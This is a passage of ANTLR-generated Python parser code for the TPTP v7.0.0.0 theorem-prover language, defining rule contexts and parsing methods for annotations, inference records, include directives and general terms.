self.atomic_word()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Optional_infoContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def useful_info(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Useful_infoContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_optional_info
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterOptional_info" ):
listener.enterOptional_info(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitOptional_info" ):
listener.exitOptional_info(self)
def optional_info(self):
localctx = tptp_v7_0_0_0Parser.Optional_infoContext(self, self._ctx, self.state)
self.enterRule(localctx, 340, self.RULE_optional_info)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1457
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 1458
self.useful_info()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Useful_infoContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def info_items(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Info_itemsContext,0)
def general_list(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.General_listContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_useful_info
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterUseful_info" ):
listener.enterUseful_info(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitUseful_info" ):
listener.exitUseful_info(self)
def useful_info(self):
localctx = tptp_v7_0_0_0Parser.Useful_infoContext(self, self._ctx, self.state)
self.enterRule(localctx, 342, self.RULE_useful_info)
try:
self.state = 1466
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,109,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 1460
self.match(tptp_v7_0_0_0Parser.T__16)
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 1461
self.match(tptp_v7_0_0_0Parser.T__11)
self.state = 1462
self.info_items()
self.state = 1463
self.match(tptp_v7_0_0_0Parser.T__12)
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 1465
self.general_list()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Info_itemsContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def info_item(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Info_itemContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Info_itemContext,i)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_info_items
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterInfo_items" ):
listener.enterInfo_items(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitInfo_items" ):
listener.exitInfo_items(self)
def info_items(self):
localctx = tptp_v7_0_0_0Parser.Info_itemsContext(self, self._ctx, self.state)
self.enterRule(localctx, 344, self.RULE_info_items)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 1468
self.info_item()
self.state = 1473
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==tptp_v7_0_0_0Parser.T__1:
self.state = 1469
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 1470
self.info_item()
self.state = 1475
self._errHandler.sync(self)
_la = self._input.LA(1)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Info_itemContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def formula_item(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Formula_itemContext,0)
def inference_item(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Inference_itemContext,0)
def general_function(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.General_functionContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_info_item
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterInfo_item" ):
listener.enterInfo_item(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitInfo_item" ):
listener.exitInfo_item(self)
def info_item(self):
localctx = tptp_v7_0_0_0Parser.Info_itemContext(self, self._ctx, self.state)
self.enterRule(localctx, 346, self.RULE_info_item)
try:
self.state = 1479
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,111,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 1476
self.formula_item()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 1477
self.inference_item()
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 1478
self.general_function()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Formula_itemContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def description_item(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Description_itemContext,0)
def iquote_item(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Iquote_itemContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_formula_item
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFormula_item" ):
listener.enterFormula_item(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFormula_item" ):
listener.exitFormula_item(self)
def formula_item(self):
localctx = tptp_v7_0_0_0Parser.Formula_itemContext(self, self._ctx, self.state)
self.enterRule(localctx, 348, self.RULE_formula_item)
try:
self.state = 1483
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.T__31]:
self.enterOuterAlt(localctx, 1)
self.state = 1481
self.description_item()
pass
elif token in [tptp_v7_0_0_0Parser.T__32]:
self.enterOuterAlt(localctx, 2)
self.state = 1482
self.iquote_item()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Description_itemContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def atomic_word(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Atomic_wordContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_description_item
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterDescription_item" ):
listener.enterDescription_item(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitDescription_item" ):
listener.exitDescription_item(self)
def description_item(self):
localctx = tptp_v7_0_0_0Parser.Description_itemContext(self, self._ctx, self.state)
self.enterRule(localctx, 350, self.RULE_description_item)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1485
self.match(tptp_v7_0_0_0Parser.T__31)
self.state = 1486
self.atomic_word()
self.state = 1487
self.match(tptp_v7_0_0_0Parser.T__10)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Iquote_itemContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def atomic_word(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Atomic_wordContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_iquote_item
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterIquote_item" ):
listener.enterIquote_item(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitIquote_item" ):
listener.exitIquote_item(self)
def iquote_item(self):
localctx = tptp_v7_0_0_0Parser.Iquote_itemContext(self, self._ctx, self.state)
self.enterRule(localctx, 352, self.RULE_iquote_item)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1489
self.match(tptp_v7_0_0_0Parser.T__32)
self.state = 1490
self.atomic_word()
self.state = 1491
self.match(tptp_v7_0_0_0Parser.T__10)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Inference_itemContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def inference_status(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Inference_statusContext,0)
def assumptions_record(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Assumptions_recordContext,0)
def new_symbol_record(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.New_symbol_recordContext,0)
def refutation(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.RefutationContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_inference_item
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterInference_item" ):
listener.enterInference_item(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitInference_item" ):
listener.exitInference_item(self)
def inference_item(self):
localctx = tptp_v7_0_0_0Parser.Inference_itemContext(self, self._ctx, self.state)
self.enterRule(localctx, 354, self.RULE_inference_item)
try:
self.state = 1497
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.T__33, tptp_v7_0_0_0Parser.Lower_word, tptp_v7_0_0_0Parser.Single_quoted]:
self.enterOuterAlt(localctx, 1)
self.state = 1493
self.inference_status()
pass
elif token in [tptp_v7_0_0_0Parser.T__34]:
self.enterOuterAlt(localctx, 2)
self.state = 1494
self.assumptions_record()
pass
elif token in [tptp_v7_0_0_0Parser.T__36]:
self.enterOuterAlt(localctx, 3)
self.state = 1495
self.new_symbol_record()
pass
elif token in [tptp_v7_0_0_0Parser.T__35]:
self.enterOuterAlt(localctx, 4)
self.state = 1496
self.refutation()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Inference_statusContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def status_value(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Status_valueContext,0)
def inference_info(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Inference_infoContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_inference_status
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterInference_status" ):
listener.enterInference_status(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitInference_status" ):
listener.exitInference_status(self)
def inference_status(self):
localctx = tptp_v7_0_0_0Parser.Inference_statusContext(self, self._ctx, self.state)
self.enterRule(localctx, 356, self.RULE_inference_status)
try:
self.state = 1504
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.T__33]:
self.enterOuterAlt(localctx, 1)
self.state = 1499
self.match(tptp_v7_0_0_0Parser.T__33)
self.state = 1500
self.status_value()
self.state = 1501
self.match(tptp_v7_0_0_0Parser.T__10)
pass
elif token in [tptp_v7_0_0_0Parser.Lower_word, tptp_v7_0_0_0Parser.Single_quoted]:
self.enterOuterAlt(localctx, 2)
self.state = 1503
self.inference_info()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Status_valueContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def Lower_word(self):
return self.getToken(tptp_v7_0_0_0Parser.Lower_word, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_status_value
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterStatus_value" ):
listener.enterStatus_value(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitStatus_value" ):
listener.exitStatus_value(self)
def status_value(self):
localctx = tptp_v7_0_0_0Parser.Status_valueContext(self, self._ctx, self.state)
self.enterRule(localctx, 358, self.RULE_status_value)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1506
self.match(tptp_v7_0_0_0Parser.Lower_word)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Inference_infoContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def inference_rule(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Inference_ruleContext,0)
def atomic_word(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Atomic_wordContext,0)
def general_list(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.General_listContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_inference_info
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterInference_info" ):
listener.enterInference_info(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitInference_info" ):
listener.exitInference_info(self)
def inference_info(self):
localctx = tptp_v7_0_0_0Parser.Inference_infoContext(self, self._ctx, self.state)
self.enterRule(localctx, 360, self.RULE_inference_info)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1508
self.inference_rule()
self.state = 1509
self.match(tptp_v7_0_0_0Parser.T__9)
self.state = 1510
self.atomic_word()
self.state = 1511
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 1512
self.general_list()
self.state = 1513
self.match(tptp_v7_0_0_0Parser.T__10)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Assumptions_recordContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def name_list(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Name_listContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_assumptions_record
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterAssumptions_record" ):
listener.enterAssumptions_record(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitAssumptions_record" ):
listener.exitAssumptions_record(self)
def assumptions_record(self):
localctx = tptp_v7_0_0_0Parser.Assumptions_recordContext(self, self._ctx, self.state)
self.enterRule(localctx, 362, self.RULE_assumptions_record)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1515
self.match(tptp_v7_0_0_0Parser.T__34)
self.state = 1516
self.match(tptp_v7_0_0_0Parser.T__11)
self.state = 1517
self.name_list()
self.state = 1518
self.match(tptp_v7_0_0_0Parser.T__12)
self.state = 1519
self.match(tptp_v7_0_0_0Parser.T__10)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class RefutationContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def file_source(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.File_sourceContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_refutation
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterRefutation" ):
listener.enterRefutation(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitRefutation" ):
listener.exitRefutation(self)
def refutation(self):
localctx = tptp_v7_0_0_0Parser.RefutationContext(self, self._ctx, self.state)
self.enterRule(localctx, 364, self.RULE_refutation)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1521
self.match(tptp_v7_0_0_0Parser.T__35)
self.state = 1522
self.file_source()
self.state = 1523
self.match(tptp_v7_0_0_0Parser.T__10)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class New_symbol_recordContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def atomic_word(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Atomic_wordContext,0)
def new_symbol_list(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.New_symbol_listContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_new_symbol_record
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterNew_symbol_record" ):
listener.enterNew_symbol_record(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitNew_symbol_record" ):
listener.exitNew_symbol_record(self)
def new_symbol_record(self):
localctx = tptp_v7_0_0_0Parser.New_symbol_recordContext(self, self._ctx, self.state)
self.enterRule(localctx, 366, self.RULE_new_symbol_record)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1525
self.match(tptp_v7_0_0_0Parser.T__36)
self.state = 1526
self.atomic_word()
self.state = 1527
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 1528
self.match(tptp_v7_0_0_0Parser.T__11)
self.state = 1529
self.new_symbol_list()
self.state = 1530
self.match(tptp_v7_0_0_0Parser.T__12)
self.state = 1531
self.match(tptp_v7_0_0_0Parser.T__10)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class New_symbol_listContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def principal_symbol(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Principal_symbolContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Principal_symbolContext,i)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_new_symbol_list
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterNew_symbol_list" ):
listener.enterNew_symbol_list(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitNew_symbol_list" ):
listener.exitNew_symbol_list(self)
def new_symbol_list(self):
localctx = tptp_v7_0_0_0Parser.New_symbol_listContext(self, self._ctx, self.state)
self.enterRule(localctx, 368, self.RULE_new_symbol_list)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 1533
self.principal_symbol()
self.state = 1538
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==tptp_v7_0_0_0Parser.T__1:
self.state = 1534
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 1535
self.principal_symbol()
self.state = 1540
self._errHandler.sync(self)
_la = self._input.LA(1)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Principal_symbolContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def functor(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.FunctorContext,0)
def variable(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.VariableContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_principal_symbol
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterPrincipal_symbol" ):
listener.enterPrincipal_symbol(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitPrincipal_symbol" ):
listener.exitPrincipal_symbol(self)
def principal_symbol(self):
localctx = tptp_v7_0_0_0Parser.Principal_symbolContext(self, self._ctx, self.state)
self.enterRule(localctx, 370, self.RULE_principal_symbol)
try:
self.state = 1543
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Lower_word, tptp_v7_0_0_0Parser.Single_quoted]:
self.enterOuterAlt(localctx, 1)
self.state = 1541
self.functor()
pass
elif token in [tptp_v7_0_0_0Parser.Upper_word]:
self.enterOuterAlt(localctx, 2)
self.state = 1542
self.variable()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class IncludeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def file_name(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.File_nameContext,0)
def formula_selection(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Formula_selectionContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_include
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterInclude" ):
listener.enterInclude(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitInclude" ):
listener.exitInclude(self)
def include(self):
localctx = tptp_v7_0_0_0Parser.IncludeContext(self, self._ctx, self.state)
self.enterRule(localctx, 372, self.RULE_include)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 1545
self.match(tptp_v7_0_0_0Parser.T__37)
self.state = 1546
self.file_name()
self.state = 1548
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==tptp_v7_0_0_0Parser.T__1:
self.state = 1547
self.formula_selection()
self.state = 1550
self.match(tptp_v7_0_0_0Parser.T__2)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Formula_selectionContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def name_list(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Name_listContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_formula_selection
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFormula_selection" ):
listener.enterFormula_selection(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFormula_selection" ):
listener.exitFormula_selection(self)
def formula_selection(self):
localctx = tptp_v7_0_0_0Parser.Formula_selectionContext(self, self._ctx, self.state)
self.enterRule(localctx, 374, self.RULE_formula_selection)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1552
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 1553
self.match(tptp_v7_0_0_0Parser.T__11)
self.state = 1554
self.name_list()
self.state = 1555
self.match(tptp_v7_0_0_0Parser.T__12)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Name_listContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def name(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.NameContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.NameContext,i)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_name_list
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterName_list" ):
listener.enterName_list(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitName_list" ):
listener.exitName_list(self)
def name_list(self):
localctx = tptp_v7_0_0_0Parser.Name_listContext(self, self._ctx, self.state)
self.enterRule(localctx, 376, self.RULE_name_list)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 1557
self.name()
self.state = 1562
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==tptp_v7_0_0_0Parser.T__1:
self.state = 1558
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 1559
self.name()
self.state = 1564
self._errHandler.sync(self)
_la = self._input.LA(1)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class General_termContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def general_data(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.General_dataContext,0)
def general_term(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.General_termContext,0)
def general_list(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.General_listContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_general_term
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterGeneral_term" ):
listener.enterGeneral_term(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitGeneral_term" ):
listener.exitGeneral_term(self)
def general_term(self):
localctx = tptp_v7_0_0_0Parser.General_termContext(self, self._ctx, self.state)
self.enterRule(localctx, 378, self.RULE_general_term)
try:
self.state = 1571
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,119,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 1565
self.general_data()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 1566
self.general_data()
self.state = 1567
self.match(tptp_v7_0_0_0Parser.T__13)
self.state = 1568
self.general_term()
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 1570
self.general_list()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class General_dataContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def atomic_word(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Atomic_wordContext,0)
def general_function(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.General_functionContext,0)
def variable(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.VariableContext,0)
def number(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.NumberContext,0)
def Distinct_object(self):
return self.getToken(tptp_v7_0_0_0Parser.Distinct_object, 0)
def formula_data(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Formula_dataContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_general_data
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterGeneral_data" ):
listener.enterGeneral_data(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitGeneral_data" ):
listener.exitGeneral_data(self)
def general_data(self):
localctx = tptp_v7_0_0_0Parser.General_dataContext(self, self._ctx, self.state)
self.enterRule(localctx, 380, self.RULE_general_data)
try:
self.state = 1579
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,120,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 1573
self.atomic_word()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 1574
self.general_function()
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 1575
self.variable()
pass
elif la_ == 4:
self.enterOuterAlt(localctx, 4)
self.state = 1576
self.number()
pass
elif la_ == 5:
self.enterOuterAlt(localctx, 5)
self.state = 1577
self.match(tptp_v7_0_0_0Parser.Distinct_object)
pass
elif la_ == 6:
self.enterOuterAlt(localctx, 6)
self.state = 1578
self.formula_data()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class General_functionContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def atomic_word(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Atomic_wordContext,0)
def general_terms(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.General_termsContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_general_function
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterGeneral_function" ):
listener.enterGeneral_function(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitGeneral_function" ):
listener.exitGeneral_function(self)
def general_function(self):
localctx = tptp_v7_0_0_0Parser.General_functionContext(self, self._ctx, self.state)
self.enterRule(localctx, 382, self.RULE_general_function)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1581
self.atomic_word()
self.state = 1582
self.match(tptp_v7_0_0_0Parser.T__9)
self.state = 1583
self.general_terms()
self.state = 1584
self.match(tptp_v7_0_0_0Parser.T__10)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Formula_dataContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_formulaContext,0)
def tff_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_formulaContext,0)
def fof_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_formulaContext,0)
def cnf_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Cnf_formulaContext,0)
def fof_term(self):
